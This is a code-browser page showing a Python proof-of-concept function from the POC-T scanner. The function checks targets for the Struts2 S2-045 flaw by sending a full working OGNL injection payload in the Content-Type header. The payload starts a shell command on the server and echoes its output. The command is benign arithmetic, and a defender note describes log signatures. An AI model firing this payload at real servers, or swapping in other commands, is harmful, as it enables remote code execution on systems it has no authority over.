hub / github.com/Xyntax/POC-T / poc

Function poc

script/struts2-s2045.py:22–41  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    """Probe *url* for the Struts2 S2-045 Content-Type OGNL injection.

    The request carries an OGNL expression in the Content-Type header that
    asks the server to run a harmless arithmetic command (``set /a`` on
    Windows, ``expr`` otherwise) on two random operands. The sum appearing
    in the response body means the expression was evaluated and a process
    was started on the target, which is how the check confirms the flaw.

    Defender note: the header value sent here starts with ``%{`` and names
    ``ognl.OgnlContext`` and ``java.lang.ProcessBuilder``. A Content-Type
    like that in request logs or WAF telemetry that record the header
    points to S2-045 scanning or exploitation.

    Args:
        url: Target URL; ``http://`` is prepended when no scheme is present.

    Returns:
        ``'[S2-045]' + url`` when the sum is found in the response text,
        otherwise ``False`` (also on any exception, such as a timeout or a
        connection failure).
    """
    # Scheme defaulting stays outside the try block, so a non-string
    # argument still raises here instead of being reported as False.
    target = url if '://' in url else 'http://' + url
    try:
        # Fresh operands on every call keep a cached or static page from
        # containing the expected sum by coincidence.
        lhs = random.randint(10000000, 20000000)
        rhs = random.randint(10000000, 20000000)
        expected_sum = str(lhs + rhs)
        windows_cmd = 'set /a %d + %d' % (lhs, rhs)
        posix_cmd = 'expr %d + %d' % (lhs, rhs)

        # The expression picks the command by the server's os.name and
        # copies the process output into the HTTP response stream.
        ognl_payload = (
            "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='"
            + windows_cmd
            + "'):(#cmd='"
            + posix_cmd
            + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        )
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
            "Content-Type": ognl_payload,
        }
        response = requests.get(target, headers=request_headers, timeout=5)
        if expected_sum not in response.text:
            return False
        return '[S2-045]' + target
    except Exception:
        # Best-effort scanner semantics: any failure is reported as
        # "not confirmed" rather than propagated to the caller.
        return False

Callers

nothing calls this directly

Calls 1

getMethod · 0.80

Tested by

no test coverage detected